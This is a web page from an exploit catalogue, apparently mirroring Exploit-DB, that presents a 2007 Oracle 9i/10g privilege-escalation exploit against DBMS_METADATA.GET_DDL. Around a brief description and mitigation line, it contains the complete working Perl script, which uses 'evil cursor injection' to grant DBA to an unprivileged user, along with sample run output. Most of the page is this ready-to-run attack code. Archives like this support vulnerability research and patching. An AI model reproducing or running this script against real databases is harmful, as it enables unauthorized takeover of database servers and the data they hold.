Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) - exploit.company
header-logo
Suggest Exploit
vendor:
Oracle Database
by:
Andrea Purificato
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Oracle Database
Affected Version From: Oracle Database 9i
Affected Version To: Oracle Database 10g
Patch Exists: NO
Related CWE:
CPE: a:oracle:database
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)

This exploit allows an attacker to grant or revoke dba permission to an unprivileged user in Oracle DBMS_METADATA.GET_DDL. It uses an 'evil cursor injection' technique and does not require 'create procedure' privilege. The exploit has been tested on Oracle Database 10g Enterprise Edition Release 10.1.0.3.0. The exploit script is provided in Perl.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Oracle Database and apply necessary security patches.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
#  - Version 2 - New "evil cursor injection" tip!
#  - No "create procedure" privileg needed!
#  - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# 
#   REF:    https://www.securityfocus.com/bid/16287
#   
#   AUTHOR: Andrea "bunker" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Fri Feb 26 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69.
#  [-] Done!
# 
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil cursor...
#  Cursor: 2
#  [-] Go ...(don't worry about errors)!
#  DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL
#  ORA-06512: at "SYS.DBMS_METADATA", line 2576
#  ORA-06512: at "SYS.DBMS_METADATA", line 2627
#  ORA-06512: at "SYS.DBMS_METADATA", line 4220
#  ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
#  DECLARE
#   R CLOB;
#  BEGIN
#   R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''','');
#  END;
#  "] at dbms_meta_get_ddlV2.pl line 101.
#  [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  [-] Done!
#  

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
    print <<"USAGE";
    
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:
     -h     <host>     target server address
     -s     <sid>      target sid name
     -u     <user>     user
     -p     <passwd>   password 

     -g|-r             (g)rant dba to user | (r)evoke dba from user
    [-P     <port>     Oracle port]

USAGE
    exit 0
}

my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};

my $dbh = undef;
if ($opt{P}) {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );


if ($opt{r}) {
    print "[-] Revoking DBA from $user...\n";
    $sqlcmd = "REVOKE DBA FROM $user";
    $dbh->do( $sqlcmd );
    print "[-] Done!\n";
    $dbh->disconnect;
    exit;
}

print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
  MYC := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
  DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { 
    print "$line\n";
    if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;

print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
 R CLOB;
BEGIN
 R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;

# milw0rm.com [2007-02-26]

Navigation

Suggest Exploit

Services By CQR